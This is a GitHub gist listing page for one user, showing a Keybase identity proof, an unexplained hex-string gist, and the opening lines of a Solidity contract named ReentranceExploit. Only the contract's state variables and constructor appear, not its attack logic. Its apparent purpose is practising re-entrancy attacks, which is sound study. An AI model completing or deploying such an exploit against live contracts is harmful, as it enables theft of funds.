Skip to content

Instantly share code, notes, and snippets.

View phillipgibb's full-sized avatar

Phillip Gibb phillipgibb

View GitHub Profile
@phillipgibb
phillipgibb / keybase.md
Created March 30, 2019 11:19
keybase.md

Keybase proof

I hereby claim:

  • I am phillipgibb on github.
  • I am phillipgibb (https://keybase.io/phillipgibb) on keybase.
  • I have a public key ASBccOR3hWWC4tIjF2I2c78ElNZQx4YagbkfpY3n915BCwo

To claim this, I am signing this object:

@phillipgibb
phillipgibb / SpringRoll.gist
Created February 15, 2019 07:49
SpringRoll
90aeec85e0b1fb3f766bd6b181b5fe846ab3c1f52f803c4edec6b913c5058514e64c6155b69edb679b5e8957d5d3f1365f615a79191130003038531ef4a95a06
@phillipgibb
phillipgibb / ReEntranceExploit.sol
Created January 5, 2018 07:46
ReEntrance Exploit
pragma solidity ^0.4.15;
contract ReentranceExploit {
bool public attackModeIsOn=false;
address public vulnerable_contract;
address public owner;
uint public withdrawValue;
function ReentranceExploit() public{
owner = msg.sender;